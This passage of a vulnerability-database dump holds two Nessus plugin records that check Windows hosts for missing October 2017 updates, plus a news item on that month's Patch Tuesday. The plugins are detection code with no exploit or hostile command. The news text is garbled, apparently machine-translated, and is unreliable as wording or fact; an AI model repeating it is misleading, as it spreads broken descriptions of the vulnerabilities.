(CVE-2017-11780)\n\n - A remote code execution vulnerability exists in Windows Domain Name System (DNS) DNSAPI.dll when it fails to properly handle DNS responses. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account. (CVE-2017-11779)\n\n - An Security Feature bypass vulnerability exists in Microsoft Windows storage when it fails to validate an integrity-level check. An attacker who successfully exploited the vulnerability could allow an application with a certain integrity level to execute code at a different integrity level. The update addresses the vulnerability by correcting how Microsoft storage validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2017-11784, CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows implementation of wireless networking. An attacker who successfully exploited this vulnerability could potentially replay broadcast and/or multicast traffic to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2018-08-03T00:00:00", "id": "SMB_NT_MS17_OCT_4041690.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103748", "published": "2017-10-10T00:00:00", "title": "Windows Server 2012 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103748);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101136,\n 101140,\n 101141,\n 101142,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041679\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041679\");\n\n script_name(english:\"Windows Server 2012 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041679\nor cumulative update 4041690. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\n\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041679/windows-server-2012-update-kb4041679\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?14f62d6a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4041690 or KB4041679.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041690', '4041679');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041690, 4041679])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:33:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041678 or cumulative update 4041681. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11813, CVE-2017-11822)\n\n - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8717, CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the way that the Windows SMB Server handles certain requests. An authenticated attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11762, CVE-2017-11763)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the Microsoft Server Block Message (SMB) when an attacker sends specially crafted requests to the server. An attacker who exploited this vulnerability could cause the affected system to crash. To attempt to exploit this issue, an attacker would need to send specially crafted SMB requests to the target system. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. The security update addresses the vulnerability by correcting the manner in which SMB handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when Windows Search improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2017-11784, CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows implementation of wireless networking. An attacker who successfully exploited this vulnerability could potentially replay broadcast and/or multicast traffic to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2018-08-03T00:00:00", "id": "SMB_NT_MS17_OCT_4041681.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103746", "published": "2017-10-10T00:00:00", "title": "Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103746);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11819\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\",\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041678\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041678\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041678\nor cumulative update 4041681. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\n\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041678/windows-7-update-kb4041678\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?501fabf5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041678 or Cumulative update KB4041681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041681', '4041678');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041681, 4041678])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2017-10-12T12:21:49", "bulletinFamily": "info", "description": "Microsoft on Tuesday's Patch Tuesday on the breath announced a 62 bug. the bug of the patch, which contains a has been applied to the major Office 0-day exploits flaws in the bug, this is by memory of the destruction occasioned by the long-distance code to perform vulnerability flaws bug\uff08 CVE-2017-11826 town. Hack to long-distance applications this vulnerability flaws bugs, to lure users to shut the particular manufacturing document, and thus fulfilling vicious thoughts code. All versions of Office are affected by the vulnerability flaws of the bug impact. \n! [](/Article/UploadPic/2017-10/20171012163339623. png? www. myhack58. com) \nBecause the software helpless to properly handle the memory in the tool lead to a long-distance code to perform vulnerability flaws bug. Intrusion the attacker can apply the vulnerability flaws of the bug in the future user cases fulfilling arbitrary whims of the code. If later the user to the governance administrator rights log in, the intrusion of the attacker to be able to in moderation the affected system: device French; check, change or delete data; and even created with the full user permissions to the new account. System user permissions to set up equipped furnishings lower user than the application of governance the user permissions of the user by the impact can be smaller. \nIn the e-mail intrusion attacks, intrusion attackers may place a specially crafted file is sent to the user and coercion the user to close the file and then apply this vulnerability flaws bug. In a Web-based intrusion attacks, intrusion attackers capable of hosting a web site or application was compromised the attack site to the receiving or host user-supplied content the website contains a vulnerability flaws bug the application of a specially crafted file. The invasion of the attacker is helpless to force users to visit the site, only to lure the user to click on the link on weekdays via the process e-mail or instant news stop hanging nylon one. \nIt is worth mentioning that this vulnerability flaws bug is the domestic qihoo 360 researchers in the invention and to the Microsoft Declaration. They are in 9 month 28 days invented with the invasion of the attacker the application of the vulnerability flaws of the bug, the joint vicious thoughts RTF file intrusion the company's majority customers. While today it is unclear details, but via the process of elucidating the invasion of the attacker the application of the C & C server, it is possible invention the intrusion attacks as early as 8 months you have begun to organize, in the 9 months of the initial start. \nThe researchers showed that the invasion of the attacker the application collection vertical nylon tips to make the purpose of the user shut the vicious thoughts file, the ultimate trigger the Trojan horse nature of the useful load, can be from contaminated equipment to steal sensitive information. Else, the intrusion is also related to some\u201cfamous\u201dnetwork security products in the DLL coerce vulnerability flaws bug. This affected the collection of the network security vendors still have not named, but Symantec, Kaspersky Labs, Rapid7, F-Secure and Comodo and other companies of the product are also the invention of the DLL coerce vulnerability flaws bug. \nMicrosoft also fixed two earlier disclosed too small but also not is Application vulnerability flaws bug: \nIn SharePoint [XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>) vulnerability flaws bug\uff08CVE-2017-11777\uff09 \nThe Linux version of the Windows sub-system in the DoS vulnerability. bug\uff08CVE-2017-8703\uff09 \nThe repair of the vulnerability flaws of the bug have 27 belonging to the major level, included with the Windows KEPT coherent long-distance perform code vulnerability flaws bug\uff08CVE-2017-11779-in. Microsoft also announced the initiative to prompt the user to pay attention to the impact Infineon may care Platform Module\uff08TPM\uff09the firmware of the network security feature bypass results. Microsoft last month total fixed about 80 vulnerabilities flaws bug, which contains a . NET 0-day exploits flaws a bug that hackers used to say that the Russian people disseminated FinFisher vicious thoughts software. \nOther weekday with Microsoft sync announced a fix to update the Adobe in this week and did not announce any network security fix. \nThe following is the repair of the 62 vulnerabilities flaws in the bug list. Interested readers can also click here to check profile, maybe Click here to check the Microsoft Update notification Bulletin and patch on. \nTag \nCVE ID \nCVE Title \nDevice Guard \nCVE-2017-8715 \nThe Windows network security feature bypass vulnerability flaws bug \nDevice Guard \nCVE-2017-11823 \nMicrosoft Windows network security feature bypass vulnerability flaws bug \nInternet Explorer \nCVE-2017-11790 \nInternet Explorer information disclosure vulnerability flaws bug \nInternet Explorer \nCVE-2017-11810 \nThe Scripting Engine memory destruction vulnerability flaws bug \nInternet Explorer \nCVE-2017-11822 \nInternet Explorer memory destruction vulnerability flaws bug \nInternet Explorer \nCVE-2017-11813 \nInternet Explorer memory destruction vulnerability flaws bug \nMicrosoft Edge \nCVE-2017-8726 \nMicrosoft Edge memory destruction vulnerability flaws bug \nMicrosoft Edge \nCVE-2017-11794 \nMicrosoft Edge information leak vulnerability flaws bug \nMicrosoft Graphics Component \nCVE-2017-11816 \nWindows GDI information leak 